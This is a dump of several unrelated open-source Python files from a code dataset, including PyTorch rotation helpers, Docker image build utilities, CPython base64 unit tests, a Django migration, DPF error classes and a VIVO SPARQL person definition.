result['n'] = len(loaded)
else:
result[k] = loaded
return result
def batch_rodrigues(rot_vecs, epsilon=1e-8, dtype=torch.float32):
''' Calculates the rotation matrices for a batch of rotation vectors
Parameters
----------
rot_vecs: torch.tensor Nx3
array of N axis-angle vectors
Returns
-------
R: torch.tensor Nx3x3
The rotation matrices for the given axis-angle parameters
'''
batch_size = rot_vecs.shape[0]
device = rot_vecs.device
angle = torch.norm(rot_vecs + 1e-8, dim=1, keepdim=True)
rot_dir = rot_vecs / angle
cos = torch.unsqueeze(torch.cos(angle), dim=1)
sin = torch.unsqueeze(torch.sin(angle), dim=1)
# Bx1 arrays
rx, ry, rz = torch.split(rot_dir, 1, dim=1)
K = torch.zeros((batch_size, 3, 3), dtype=dtype, device=device)
zeros = torch.zeros((batch_size, 1), dtype=dtype, device=device)
K = torch.cat([zeros, -rz, ry, rz, zeros, -rx, -ry, rx, zeros], dim=1) \
.view((batch_size, 3, 3))
ident = torch.eye(3, dtype=dtype, device=device).unsqueeze(dim=0)
rot_mat = ident + sin * K + (1 - cos) * torch.bmm(K, K)
return rot_mat
def get_selected_ids(id_sel_set, req_ids):
ss_sort = np.argsort(id_sel_set)
req_sort = np.argsort(req_ids)
id_ss_srt = id_sel_set[ss_sort]
id_ss_pos = np.arange(0, len(id_sel_set))[ss_sort]
req_srt = req_ids[req_sort]
req_srt_pos = -1 * np.ones(len(req_srt), dtype=int)
i = 0
j = 0
while i < len(id_ss_srt) and j < len(req_srt):
if req_srt[j] == id_ss_srt[i]:
req_srt_pos[j] = id_ss_pos[i]
i += 1
j += 1
elif req_srt[j] < id_ss_srt[i]:
j += 1
elif id_ss_srt[i] < req_srt[j]:
i += 1
req_ids_ans = -1 * np.ones(len(req_srt), dtype=int)
req_ids_ans[req_sort] = req_srt_pos
return req_ids_ans
| 2.171875 | 2 |
scripts/dev/dockerutil.py | axelbarjon/mongodb-kubernetes-operator | 1 | 3364 | import docker
from dockerfile_generator import render
import os
import json
from tqdm import tqdm
from typing import Union, Any, Optional
def build_image(repo_url: str, tag: str, path: str) -> None:
"""
build_image builds the image with the given tag
"""
client = docker.from_env()
print(f"Building image: {tag}")
client.images.build(tag=tag, path=path)
print("Successfully built image!")
def push_image(tag: str) -> None:
"""
push_image pushes the given tag. It uses
the current docker environment
"""
client = docker.from_env()
print(f"Pushing image: {tag}")
with tqdm(total=100, ascii=False) as progress_bar:
last_percent = 0.0
for line in client.images.push(tag, stream=True):
percent = get_completion_percentage(line)
if percent:
progress_bar.update(percent - last_percent)
last_percent = percent
def retag_image(
old_repo_url: str,
new_repo_url: str,
old_tag: str,
new_tag: str,
path: str,
labels: Optional[dict] = None,
username: Optional[str] = None,
password: Optional[str] = None,
registry: Optional[str] = None,
) -> None:
with open(f"{path}/Dockerfile", "w") as f:
f.write(f"FROM {old_repo_url}:{old_tag}")
client = docker.from_env()
if all(value is not None for value in [username, password, registry]):
client.login(username=username, password=password, registry=registry)
image, _ = client.images.build(path=f"{path}", labels=labels, tag=new_tag)
image.tag(new_repo_url, new_tag)
os.remove(f"{path}/Dockerfile")
# We do not want to republish an image that has not changed, so we check if the new
# pair repo:tag already exists.
try:
image = client.images.pull(new_repo_url, new_tag)
return
# We also need to catch APIError as if the image has been recently deleted (uncommon, but might happen?)
# we will get this kind of error:
# docker.errors.APIError: 500 Server Error: Internal Server Error
# ("unknown: Tag <tag> was deleted or has expired. To pull, revive via time machine"
except (docker.errors.ImageNotFound, docker.errors.APIError) as e:
pass
print(f"Pushing to {new_repo_url}:{new_tag}")
client.images.push(new_repo_url, new_tag)
def get_completion_percentage(line: Any) -> float:
try:
line = json.loads(line.strip().decode("utf-8"))
except ValueError:
return 0
to_skip = ("Preparing", "Waiting", "Layer already exists")
if "status" in line:
if line["status"] in to_skip:
return 0
if line["status"] == "Pushing":
try:
current = float(line["progressDetail"]["current"])
total = float(line["progressDetail"]["total"])
except KeyError:
return 0
result = (current / total) * 100
if result > 100.0:
return 100.0
return result
return 0
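# Illustrative input for the helper above (values are hypothetical): a streamed push line such as
#   b'{"status": "Pushing", "progressDetail": {"current": 50, "total": 200}}'
# yields 25.0, while "Preparing"/"Waiting"/"Layer already exists" lines yield 0.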
def build_and_push_image(repo_url: str, tag: str, path: str, image_type: str) -> None:
"""
build_and_push_operator creates the Dockerfile for the operator
and pushes it to the target repo
"""
dockerfile_text = render(image_type, ["."])
with open(f"{path}/Dockerfile", "w") as f:
f.write(dockerfile_text)
build_image(repo_url, tag, path)
os.remove(f"{path}/Dockerfile")
push_image(tag)
| 2.421875 | 2 |
scripts/VCF/UTILS/select_variants.py | elowy01/igsr_analysis | 3 | 3365 | <gh_stars>1-10
from VcfFilter import VcfFilter
import argparse
import os
#get command line arguments
parser = argparse.ArgumentParser(description='Script to select a certain variant type from a VCF file')
#parameters
parser.add_argument('--bcftools_folder', type=str, required=True, help='Folder containing the Bcftools binary' )
parser.add_argument('--filename', type=str, required=True, help='Name (without the fullpath) of the VCF file that will be analysed. It assumes that the filename format is for example lc_bams.gatk.xxxx.vcf.gz, where lc_bams is the analysis group and gatk is the method used' )
parser.add_argument('--type', type=str, required=False, help='Type of variant to select. i.e. snps/indels etc' )
args = parser.parse_args()
if __name__ == '__main__':
vcf_f=VcfFilter(vcf=args.filename,bcftools_folder=args.bcftools_folder)
vcf_f.filter_by_variant_type(type=args.type)
| 2.828125 | 3 |
site/tests/unittests/test/test_base64.py | martinphellwig/brython_wf | 652 | 3366 | <filename>site/tests/unittests/test/test_base64.py
import unittest
from test import support
import base64
import binascii
import os
import sys
import subprocess
class LegacyBase64TestCase(unittest.TestCase):
def test_encodebytes(self):
eq = self.assertEqual
eq(base64.encodebytes(b"www.python.org"), b"d3d3LnB5dGhvbi5vcmc=\n")
eq(base64.encodebytes(b"a"), b"YQ==\n")
eq(base64.encodebytes(b"ab"), b"YWI=\n")
eq(base64.encodebytes(b"abc"), b"YWJj\n")
eq(base64.encodebytes(b""), b"")
eq(base64.encodebytes(b"abcdefghijklmnopqrstuvwxyz"
b"ABCDEFGHIJKLMNOPQRSTUVWXYZ"
b"0123456789!@#0^&*();:<>,. []{}"),
b"YWJjZGVmZ2hpamtsbW5vcHFyc3R1dnd4eXpBQkNE"
b"RUZHSElKS0xNTk9QUVJTVFVWV1hZWjAxMjM0\nNT"
b"Y3ODkhQCMwXiYqKCk7Ojw+LC4gW117fQ==\n")
# Non-bytes
eq(base64.encodebytes(bytearray(b'abc')), b'YWJj\n')
self.assertRaises(TypeError, base64.encodebytes, "")
def test_decodebytes(self):
eq = self.assertEqual
eq(base64.decodebytes(b"d3d3LnB5dGhvbi5vcmc=\n"), b"www.python.org")
eq(base64.decodebytes(b"YQ==\n"), b"a")
eq(base64.decodebytes(b"YWI=\n"), b"ab")
eq(base64.decodebytes(b"YWJj\n"), b"abc")
eq(base64.decodebytes(b"YWJjZGVmZ2hpamtsbW5vcHFyc3R1dnd4eXpBQkNE"
b"RUZHSElKS0xNTk9QUVJTVFVWV1hZWjAxMjM0\nNT"
b"Y3ODkhQCMwXiYqKCk7Ojw+LC4gW117fQ==\n"),
b"abcdefghijklmnopqrstuvwxyz"
b"ABCDEFGHIJKLMNOPQRSTUVWXYZ"
b"0123456789!@#0^&*();:<>,. []{}")
eq(base64.decodebytes(b''), b'')
# Non-bytes
eq(base64.decodebytes(bytearray(b'YWJj\n')), b'abc')
self.assertRaises(TypeError, base64.decodebytes, "")
def test_encode(self):
eq = self.assertEqual
from io import BytesIO, StringIO
infp = BytesIO(b'abcdefghijklmnopqrstuvwxyz'
b'ABCDEFGHIJKLMNOPQRSTUVWXYZ'
b'0123456789!@#0^&*();:<>,. []{}')
outfp = BytesIO()
base64.encode(infp, outfp)
eq(outfp.getvalue(),
b'YWJjZGVmZ2hpamtsbW5vcHFyc3R1dnd4eXpBQkNE'
b'RUZHSElKS0xNTk9QUVJTVFVWV1hZWjAxMjM0\nNT'
b'Y3ODkhQCMwXiYqKCk7Ojw+LC4gW117fQ==\n')
# Non-binary files
self.assertRaises(TypeError, base64.encode, StringIO('abc'), BytesIO())
self.assertRaises(TypeError, base64.encode, BytesIO(b'abc'), StringIO())
self.assertRaises(TypeError, base64.encode, StringIO('abc'), StringIO())
def test_decode(self):
from io import BytesIO, StringIO
infp = BytesIO(b'd3d3LnB5dGhvbi5vcmc=')
outfp = BytesIO()
base64.decode(infp, outfp)
self.assertEqual(outfp.getvalue(), b'www.python.org')
# Non-binary files
self.assertRaises(TypeError, base64.encode, StringIO('YWJj\n'), BytesIO())
self.assertRaises(TypeError, base64.encode, BytesIO(b'YWJj\n'), StringIO())
self.assertRaises(TypeError, base64.encode, StringIO('YWJj\n'), StringIO())
class BaseXYTestCase(unittest.TestCase):
def test_b64encode(self):
eq = self.assertEqual
# Test default alphabet
eq(base64.b64encode(b"www.python.org"), b"d3d3LnB5dGhvbi5vcmc=")
eq(base64.b64encode(b'\x00'), b'AA==')
eq(base64.b64encode(b"a"), b"YQ==")
eq(base64.b64encode(b"ab"), b"YWI=")
eq(base64.b64encode(b"abc"), b"YWJj")
eq(base64.b64encode(b""), b"")
eq(base64.b64encode(b"abcdefghijklmnopqrstuvwxyz"
b"ABCDEFGHIJKLMNOPQRSTUVWXYZ"
b"0123456789!@#0^&*();:<>,. []{}"),
b"YWJjZGVmZ2hpamtsbW5vcHFyc3R1dnd4eXpBQkNE"
b"RUZHSElKS0xNTk9QUVJTVFVWV1hZWjAxMjM0NT"
b"Y3ODkhQCMwXiYqKCk7Ojw+LC4gW117fQ==")
# Test with arbitrary alternative characters
eq(base64.b64encode(b'\xd3V\xbeo\xf7\x1d', altchars=b'*$'), b'01a*b$cd')
# Non-bytes
eq(base64.b64encode(bytearray(b'abcd')), b'YWJjZA==')
eq(base64.b64encode(b'\xd3V\xbeo\xf7\x1d', altchars=bytearray(b'*$')),
b'01a*b$cd')
# Check if passing a str object raises an error
self.assertRaises(TypeError, base64.b64encode, "")
self.assertRaises(TypeError, base64.b64encode, b"", altchars="")
# Test standard alphabet
eq(base64.standard_b64encode(b"www.python.org"), b"d3d3LnB5dGhvbi5vcmc=")
eq(base64.standard_b64encode(b"a"), b"YQ==")
eq(base64.standard_b64encode(b"ab"), b"YWI=")
eq(base64.standard_b64encode(b"abc"), b"YWJj")
eq(base64.standard_b64encode(b""), b"")
eq(base64.standard_b64encode(b"abcdefghijklmnopqrstuvwxyz"
b"ABCDEFGHIJKLMNOPQRSTUVWXYZ"
b"0123456789!@#0^&*();:<>,. []{}"),
b"YWJjZGVmZ2hpamtsbW5vcHFyc3R1dnd4eXpBQkNE"
b"RUZHSElKS0xNTk9QUVJTVFVWV1hZWjAxMjM0NT"
b"Y3ODkhQCMwXiYqKCk7Ojw+LC4gW117fQ==")
# Non-bytes
eq(base64.standard_b64encode(bytearray(b'abcd')), b'YWJjZA==')
# Check if passing a str object raises an error
self.assertRaises(TypeError, base64.standard_b64encode, "")
# Test with 'URL safe' alternative characters
eq(base64.urlsafe_b64encode(b'\xd3V\xbeo\xf7\x1d'), b'01a-b_cd')
# Non-bytes
eq(base64.urlsafe_b64encode(bytearray(b'\xd3V\xbeo\xf7\x1d')), b'01a-b_cd')
# Check if passing a str object raises an error
self.assertRaises(TypeError, base64.urlsafe_b64encode, "")
def test_b64decode(self):
eq = self.assertEqual
tests = {b"d3d3LnB5dGhvbi5vcmc=": b"www.python.org",
b'AA==': b'\x00',
b"YQ==": b"a",
b"YWI=": b"ab",
b"YWJj": b"abc",
b"YWJjZGVmZ2hpamtsbW5vcHFyc3R1dnd4eXpBQkNE"
b"RUZHSElKS0xNTk9QUVJTVFVWV1hZWjAxMjM0\nNT"
b"Y3ODkhQCMwXiYqKCk7Ojw+LC4gW117fQ==":
b"abcdefghijklmnopqrstuvwxyz"
b"ABCDEFGHIJKLMNOPQRSTUVWXYZ"
b"0123456789!@#0^&*();:<>,. []{}",
b'': b'',
}
for data, res in tests.items():
eq(base64.b64decode(data), res)
eq(base64.b64decode(data.decode('ascii')), res)
# Non-bytes
eq(base64.b64decode(bytearray(b"YWJj")), b"abc")
# Test with arbitrary alternative characters
tests_altchars = {(b'01a*b$cd', b'*$'): b'\xd3V\xbeo\xf7\x1d',
}
for (data, altchars), res in tests_altchars.items():
data_str = data.decode('ascii')
altchars_str = altchars.decode('ascii')
eq(base64.b64decode(data, altchars=altchars), res)
eq(base64.b64decode(data_str, altchars=altchars), res)
eq(base64.b64decode(data, altchars=altchars_str), res)
eq(base64.b64decode(data_str, altchars=altchars_str), res)
# Test standard alphabet
for data, res in tests.items():
eq(base64.standard_b64decode(data), res)
eq(base64.standard_b64decode(data.decode('ascii')), res)
# Non-bytes
eq(base64.standard_b64decode(bytearray(b"YWJj")), b"abc")
# Test with 'URL safe' alternative characters
tests_urlsafe = {b'01a-b_cd': b'\xd3V\xbeo\xf7\x1d',
b'': b'',
}
for data, res in tests_urlsafe.items():
eq(base64.urlsafe_b64decode(data), res)
eq(base64.urlsafe_b64decode(data.decode('ascii')), res)
# Non-bytes
eq(base64.urlsafe_b64decode(bytearray(b'01a-b_cd')), b'\xd3V\xbeo\xf7\x1d')
def test_b64decode_padding_error(self):
self.assertRaises(binascii.Error, base64.b64decode, b'abc')
self.assertRaises(binascii.Error, base64.b64decode, 'abc')
def test_b64decode_invalid_chars(self):
# issue 1466065: Test some invalid characters.
tests = ((b'%3d==', b'\xdd'),
(b'$3d==', b'\xdd'),
(b'[==', b''),
(b'YW]3=', b'am'),
(b'3{d==', b'\xdd'),
(b'3d}==', b'\xdd'),
(b'@@', b''),
(b'!', b''),
(b'YWJj\nYWI=', b'abcab'))
for bstr, res in tests:
self.assertEqual(base64.b64decode(bstr), res)
self.assertEqual(base64.b64decode(bstr.decode('ascii')), res)
with self.assertRaises(binascii.Error):
base64.b64decode(bstr, validate=True)
with self.assertRaises(binascii.Error):
base64.b64decode(bstr.decode('ascii'), validate=True)
def test_b32encode(self):
eq = self.assertEqual
eq(base64.b32encode(b''), b'')
eq(base64.b32encode(b'\x00'), b'AA======')
eq(base64.b32encode(b'a'), b'ME======')
eq(base64.b32encode(b'ab'), b'MFRA====')
eq(base64.b32encode(b'abc'), b'MFRGG===')
eq(base64.b32encode(b'abcd'), b'MFRGGZA=')
eq(base64.b32encode(b'abcde'), b'MFRGGZDF')
# Non-bytes
eq(base64.b32encode(bytearray(b'abcd')), b'MFRGGZA=')
self.assertRaises(TypeError, base64.b32encode, "")
def test_b32decode(self):
eq = self.assertEqual
tests = {b'': b'',
b'AA======': b'\x00',
b'ME======': b'a',
b'MFRA====': b'ab',
b'MFRGG===': b'abc',
b'MFRGGZA=': b'abcd',
b'MFRGGZDF': b'abcde',
}
for data, res in tests.items():
eq(base64.b32decode(data), res)
eq(base64.b32decode(data.decode('ascii')), res)
# Non-bytes
eq(base64.b32decode(bytearray(b'MFRGG===')), b'abc')
def test_b32decode_casefold(self):
eq = self.assertEqual
tests = {b'': b'',
b'ME======': b'a',
b'MFRA====': b'ab',
b'MFRGG===': b'abc',
b'MFRGGZA=': b'abcd',
b'MFRGGZDF': b'abcde',
# Lower cases
b'me======': b'a',
b'mfra====': b'ab',
b'mfrgg===': b'abc',
b'mfrggza=': b'abcd',
b'mfrggzdf': b'abcde',
}
for data, res in tests.items():
eq(base64.b32decode(data, True), res)
eq(base64.b32decode(data.decode('ascii'), True), res)
self.assertRaises(binascii.Error, base64.b32decode, b'me======')
self.assertRaises(binascii.Error, base64.b32decode, 'me======')
# Mapping zero and one
eq(base64.b32decode(b'MLO23456'), b'b\xdd\xad\xf3\xbe')
eq(base64.b32decode('MLO23456'), b'b\xdd\xad\xf3\xbe')
map_tests = {(b'M1023456', b'L'): b'b\xdd\xad\xf3\xbe',
(b'M1023456', b'I'): b'b\x1d\xad\xf3\xbe',
}
for (data, map01), res in map_tests.items():
data_str = data.decode('ascii')
map01_str = map01.decode('ascii')
eq(base64.b32decode(data, map01=map01), res)
eq(base64.b32decode(data_str, map01=map01), res)
eq(base64.b32decode(data, map01=map01_str), res)
eq(base64.b32decode(data_str, map01=map01_str), res)
self.assertRaises(binascii.Error, base64.b32decode, data)
self.assertRaises(binascii.Error, base64.b32decode, data_str)
def test_b32decode_error(self):
for data in [b'abc', b'ABCDEF==', b'==ABCDEF']:
with self.assertRaises(binascii.Error):
base64.b32decode(data)
with self.assertRaises(binascii.Error):
base64.b32decode(data.decode('ascii'))
def test_b16encode(self):
eq = self.assertEqual
eq(base64.b16encode(b'\x01\x02\xab\xcd\xef'), b'0102ABCDEF')
eq(base64.b16encode(b'\x00'), b'00')
# Non-bytes
eq(base64.b16encode(bytearray(b'\x01\x02\xab\xcd\xef')), b'0102ABCDEF')
self.assertRaises(TypeError, base64.b16encode, "")
def test_b16decode(self):
eq = self.assertEqual
eq(base64.b16decode(b'0102ABCDEF'), b'\x01\x02\xab\xcd\xef')
eq(base64.b16decode('0102ABCDEF'), b'\x01\x02\xab\xcd\xef')
eq(base64.b16decode(b'00'), b'\x00')
eq(base64.b16decode('00'), b'\x00')
# Lower case is not allowed without a flag
self.assertRaises(binascii.Error, base64.b16decode, b'0102abcdef')
self.assertRaises(binascii.Error, base64.b16decode, '0102abcdef')
# Case fold
eq(base64.b16decode(b'0102abcdef', True), b'\x01\x02\xab\xcd\xef')
eq(base64.b16decode('0102abcdef', True), b'\x01\x02\xab\xcd\xef')
# Non-bytes
eq(base64.b16decode(bytearray(b"0102ABCDEF")), b'\x01\x02\xab\xcd\xef')
def test_decode_nonascii_str(self):
decode_funcs = (base64.b64decode,
base64.standard_b64decode,
base64.urlsafe_b64decode,
base64.b32decode,
base64.b16decode)
for f in decode_funcs:
self.assertRaises(ValueError, f, 'with non-ascii \xcb')
def test_ErrorHeritage(self):
self.assertTrue(issubclass(binascii.Error, ValueError))
class TestMain(unittest.TestCase):
def tearDown(self):
if os.path.exists(support.TESTFN):
os.unlink(support.TESTFN)
def get_output(self, *args, **options):
args = (sys.executable, '-m', 'base64') + args
return subprocess.check_output(args, **options)
def test_encode_decode(self):
output = self.get_output('-t')
self.assertSequenceEqual(output.splitlines(), (
b"b'Aladdin:open sesame'",
br"b'QWxhZGRpbjpvcGVuIHNlc2FtZQ==\n'",
b"b'Aladdin:open sesame'",
))
def test_encode_file(self):
with open(support.TESTFN, 'wb') as fp:
fp.write(b'a\xffb\n')
output = self.get_output('-e', support.TESTFN)
self.assertEqual(output.rstrip(), b'Yf9iCg==')
with open(support.TESTFN, 'rb') as fp:
output = self.get_output('-e', stdin=fp)
self.assertEqual(output.rstrip(), b'Yf9iCg==')
def test_decode(self):
with open(support.TESTFN, 'wb') as fp:
fp.write(b'Yf9iCg==')
output = self.get_output('-d', support.TESTFN)
self.assertEqual(output.rstrip(), b'a\xffb')
def test_main():
support.run_unittest(__name__)
if __name__ == '__main__':
test_main()
| 2.84375 | 3 |
appliance_catalog/migrations/0015_appliance_icon_py3.py | ChameleonCloud/portal | 3 | 3367 | <filename>appliance_catalog/migrations/0015_appliance_icon_py3.py
# -*- coding: utf-8 -*-
# Generated by Django 1.11.29 on 2021-02-25 20:32
from __future__ import unicode_literals
from django.db import migrations, models
class Migration(migrations.Migration):
"""Updates ImageField syntax for later version.
"""
dependencies = [
('appliance_catalog', '0014_auto_20180625_1104'),
]
operations = [
migrations.AlterField(
model_name='appliance',
name='appliance_icon',
field=models.ImageField(blank=True, upload_to='appliance_catalog/icons/'),
),
]
| 1.210938 | 1 |
twitoff/twitter.py | ChristopherKchilton/twitoff-ChristopherKchilton | 1 | 3368 | <reponame>ChristopherKchilton/twitoff-ChristopherKchilton
"""Retrieve and request tweets from the DS API"""
import requests
import spacy
from .models import DB, Tweet, User
nlp = spacy.load("my_model")
def vectorize_tweet(tweet_text):
return nlp(tweet_text).vector
# Add and updates tweets
def add_or_update_user(username):
"""Adds and updates the user with twiter handle 'username'
to our database
"""
#TODO: Figure out
try:
r = requests.get(
f"https://lambda-ds-twit-assist.herokuapp.com/user/{username}")
user = r.json()
user_id = user["twitter_handle"]["id"]
# print(user)
# This is either respectively grabs or creates a user for our db
db_user = (User.query.get(user_id)) or User(id=user_id, name=username)
# This adds the db_user to our database
DB.session.add(db_user)
tweets = user["tweets"]
# if tweets:
# db_user.newest_tweet_id = tweets[0].id
for tweet in tweets:
tweet_vector = vectorize_tweet(tweet["full_text"])
tweet_id = tweet["id"]
db_tweet = (Tweet.query.get(tweet_id)) or Tweet(
id=tweet["id"], text=tweet["full_text"], vect=tweet_vector)
db_user.tweets.append(db_tweet)
DB.session.add(db_tweet)
except Exception as e:
print("Error processing {}: {}".format(username, e))
raise e
else:
DB.session.commit()
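# Example call (hypothetical handle); pulls the user's tweets from the DS API and stores them:
#   add_or_update_user("nasa")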
| 3.25 | 3 |
day22.py | p88h/aoc2017 | 1 | 3369 | import io
grid = {}
y = 0
x = 0
for l in io.open("day22.in").read().splitlines():
for x in range(len(l)):
grid[(y,x)] = l[x]
y += 1
y = y // 2
x = x // 2
dx = 0
dy = -1
r = 0
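# Burst rules implemented below: clean ('.') -> turn left and weaken ('W');
# weakened ('W') -> keep heading and infect ('#'), counting the infection;
# infected ('#') -> turn right and flag ('F'); flagged ('F') -> reverse and clean ('.').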
for iter in range(10000000):
if (y,x) not in grid or grid[(y,x)] == '.':
(dy, dx) = (-dx, dy)
grid[(y,x)] = 'W'
elif grid[(y,x)] == 'W':
grid[(y,x)] = '#'
r += 1
elif grid[(y,x)] == '#':
(dy, dx) = (dx, -dy)
grid[(y,x)] = 'F'
elif grid[(y,x)] == 'F':
(dy, dx) = (-dy, -dx)
grid[(y,x)] = '.'
y += dy
x += dx
print(r) | 3.03125 | 3 |
ansys/dpf/core/errors.py | TheGoldfish01/pydpf-core | 11 | 3370 | from grpc._channel import _InactiveRpcError, _MultiThreadedRendezvous
from functools import wraps
_COMPLEX_PLOTTING_ERROR_MSG = """
Complex fields cannot be plotted. Use operators to get the amplitude
or the result at a defined sweeping phase before plotting.
"""
_FIELD_CONTAINER_PLOTTING_MSG = """"
This fields_container contains multiple fields. Only one time-step
result can be plotted at a time. Extract a field with
``fields_container[index]``.
"""
class DpfVersionNotSupported(RuntimeError):
"""Error raised when the dpf-core/grpc-dpf python features are not
supported by the DPF gRPC server version."""
def __init__(self, version, msg=None):
if msg is None:
msg = "Feature not supported. Upgrade the server to "
msg += str(version)
msg += " version (or above)."
RuntimeError.__init__(self, msg)
class DpfValueError(ValueError):
"""Error raised when a specific DPF error value must be defined."""
def __init__(
self, msg="A value that has been set leads to incorrect DPF behavior."
):
ValueError.__init__(self, msg)
class InvalidTypeError(ValueError):
"""Error raised when a parameter has the wrong type."""
def __init__(self, data_type, parameter_name):
msg = (
"A "
+ data_type
+ " must be used for the following parameter: "
+ parameter_name
+ "."
)
ValueError.__init__(self, msg)
class LocationError(ValueError):
"""Error raised when using an invalid location."""
def __init__(self, msg="Invalid location"):
ValueError.__init__(self, msg)
class ComplexPlottingError(ValueError):
"""Error raised when attempting to plot a field with complex data."""
def __init__(self, msg=_COMPLEX_PLOTTING_ERROR_MSG):
ValueError.__init__(self, msg)
class FieldContainerPlottingError(ValueError):
"""Error raised when attempting to plot a fields_container containing
multiple fields."""
def __init__(self, msg=_FIELD_CONTAINER_PLOTTING_MSG):
ValueError.__init__(self, msg)
class InvalidANSYSVersionError(RuntimeError):
"""Error raised when the Ansys verion is invalid."""
def __init__(self, msg=""):
RuntimeError.__init__(self, msg)
class DPFServerException(Exception):
"""Error raised when the DPF server has encountered an error."""
def __init__(self, msg=""):
Exception.__init__(self, msg)
class DPFServerNullObject(Exception):
"""Error raised when the DPF server cannot find an object."""
def __init__(self, msg=""):
Exception.__init__(self, msg)
class InvalidPortError(OSError):
"""Error raised when used an invalid port when starting DPF."""
def __init__(self, msg=""):
OSError.__init__(self, msg)
def protect_grpc(func):
"""Capture gRPC exceptions and return a more succinct error message."""
@wraps(func)
def wrapper(*args, **kwargs):
"""Capture gRPC exceptions."""
# Capture gRPC exceptions
try:
out = func(*args, **kwargs)
except (_InactiveRpcError, _MultiThreadedRendezvous) as error:
details = error.details()
if "object is null in the dataBase" in details:
raise DPFServerNullObject(details) from None
raise DPFServerException(details) from None
return out
return wrapper
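# Minimal usage sketch (the function name is hypothetical): any gRPC failure inside the call
# is re-raised as DPFServerException or DPFServerNullObject.
#   @protect_grpc
#   def fetch_field(stub, request):
#       return stub.Get(request)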
| 2.296875 | 2 |
deep_disfluency/feature_extraction/wer_calculation_from_final_asr_results.py | askender/deep_disfluency | 0 | 3371 | from mumodo.mumodoIO import open_intervalframe_from_textgrid
import numpy
from deep_disfluency.utils.accuracy import wer
final_file = open('wer_test.text', "w")
ranges1 = [line.strip() for line in open(
"/media/data/jh/simple_rnn_disf/rnn_disf_detection/data/disfluency_detection/swda_divisions_disfluency_detection/SWDisfHeldoutASR_ranges.text")]
ranges2 = [line.strip() for line in open(
"/media/data/jh/simple_rnn_disf/rnn_disf_detection/data/disfluency_detection/swda_divisions_disfluency_detection/SWDisfTestASR_ranges.text")]
for ranges in [ranges1, ranges2]:
final_file.write("\n\n")
for r in ranges:
for s in ["A", "B"]:
iframe = open_intervalframe_from_textgrid("{0}{1}.TextGrid"
.format(r, s))
hyp = " ".join(iframe['Hyp']['text'])
ref = " ".join(iframe['Ref']['text'])
            word_error_rate = wer(ref, hyp)
            cost = wer(ref, hyp, macro=True)
            print r, s, word_error_rate
            print>>final_file, r, s, word_error_rate, cost
final_file.close()
# Based on the results, output the 'good' ASR results
results = open("wer_test.text")
no_ho = 0
no_test = 0
ingood = True
file = open("../../../simple_rnn_disf/rnn_disf_detection/data/disfluency_detection/swda_divisions_disfluency_detection/SWDisfHeldoutASRgood_ranges.text", "w")
for l in results:
# print l
if l == "\n":
print no_ho
no_ho = 0
file.close()
file = open(
"../../../simple_rnn_disf/rnn_disf_detection/data/disfluency_detection/swda_divisions_disfluency_detection/SWDisfTestASRgood_ranges.text",
"w")
continue
if float(l.strip('\n').split(" ")[
2]) < 0.4: # both speakers are under 40% error rate- likely half decent separation
# print l
if ingood and "B" in l.strip("\n").split(" ")[1]:
no_ho += 1
#file.write(l.strip('\n').split(" ")[0]+l.strip('\n').split(" ")[1]+"\n")
file.write(l.strip('\n').split(" ")[0] + "\n")
ingood = True
else:
ingood = False
print no_ho
results.close()
file.close()
| 2.40625 | 2 |
newsweec/utils/_dataclasses.py | Adwaith-Rajesh/newsweec | 13 | 3372 | from dataclasses import dataclass
from dataclasses import field
from time import time
from typing import Any
from typing import Callable
from typing import Dict
from typing import List
from typing import Optional
from typing import Tuple
@dataclass
class NewUser:
"""Deals with the commands the user is currently sending"""
user_id: int
chat_id: int
command: str
def __repr__(self) -> str:
return f"{self.user_id=} {self.command=}"
@dataclass
class UserCommand:
"""Stores the latest command sent by the user"""
user_id: int
command: str
    insert_time: int = field(default_factory=lambda: int(time()))  # for garbage collection; evaluated per instance
def __repr__(self) -> str:
return f"{self.user_id=} {self.command=} {self.insert_time=}"
@dataclass
class MessageInfo:
"""Important things in the message"""
user_id: int
chat_id: int
message_id: int
text: str
def __repr__(self) -> str:
return f"{self.user_id=} {self.chat_id=} {self.message_id=} {self.text=}"
@dataclass
class UserDBInfo:
"""Info about the user from the DB"""
feed: bool # if false, the bot will not send any news feeds on a daily basis
user_id: int
db_id: int
topics: List[str] = field(default_factory=lambda: [])
def __repr__(self) -> str:
return f"{self.user_id=} {self.feed=} {self.db_id=} {self.topics=}"
@dataclass
class StagedFunction:
"""For FunctionStagingArea"""
fn: Callable[..., Any]
args: Optional[Tuple[Any, ...]] = None
kwargs: Optional[Dict[str, Any]] = None
| 2.96875 | 3 |
vivo2notld/definitions/person_definition.py | gwu-libraries/vivo2notld | 5 | 3373 | <filename>vivo2notld/definitions/person_definition.py
from .document_summary import definition as document_summary_definition
from .organization_summary import definition as organization_summmary_definition
definition = {
"where": "?subj a foaf:Person .",
"fields": {
"name": {
"where": "?subj rdfs:label ?obj ."
},
#Contact info
"email": {
"where": """
?subj obo:ARG_2000028 ?vc .
?vc a vcard:Kind .
?vc vcard:hasEmail ?vce .
?vce a vcard:Email, vcard:Work .
?vce vcard:email ?obj .
"""
},
"telephone": {
"where": """
?subj obo:ARG_2000028 ?vc .
?vc a vcard:Kind .
?vc vcard:hasTelephone ?vct .
?vct a vcard:Telephone .
?vct vcard:telephone ?obj .
"""
},
"address": {
"where": """
?subj obo:ARG_2000028 ?vc .
?vc a vcard:Kind .
?vc vcard:hasAddress ?obj .
""",
"definition": {
"where": "?subj a vcard:Address .",
"fields": {
"address": {
"where": "?subj vcard:streetAddress ?obj ."
},
"city": {
"where": "?subj vcard:locality ?obj ."
},
"state": {
"where": "?subj vcard:region ?obj ."
},
"zip": {
"where": "?subj vcard:postalCode ?obj ."
}
}
}
},
"website": {
"list": True,
"where": """
?subj obo:ARG_2000028 ?vc .
?vc a vcard:Kind .
?vc vcard:hasURL ?vcu .
?vcu a vcard:URL .
?vcu vcard:url ?obj .
""",
"optional": True
},
"researchArea": {
"where": """
?subj vivo:hasResearchArea ?ra .
?ra rdfs:label ?obj .
""",
"optional": True,
"list": True
},
"geographicFocus": {
"where": """
?subj vivo:geographicFocus ?gf .
?gf rdfs:label ?obj .
""",
"optional": True,
"list": True
},
"overview": {
"where": "?subj vivo:overview ?obj .",
"optional": True,
},
"positions": {
"where": "?subj vivo:relatedBy ?obj .",
"definition": {
"where": "?subj a vivo:Position .",
"fields": {
"title": {
"where": "?subj rdfs:label ?obj ."
},
"organization": {
"where": "?subj vivo:relates ?obj .",
"definition": organization_summmary_definition
}
}
},
"optional": True,
"list": True
},
"publications": {
"where": """
?subj vivo:relatedBy ?aship .
?aship a vivo:Authorship .
?aship vivo:relates ?obj .
""",
"definition": document_summary_definition,
"optional": True,
"list": True
}
}
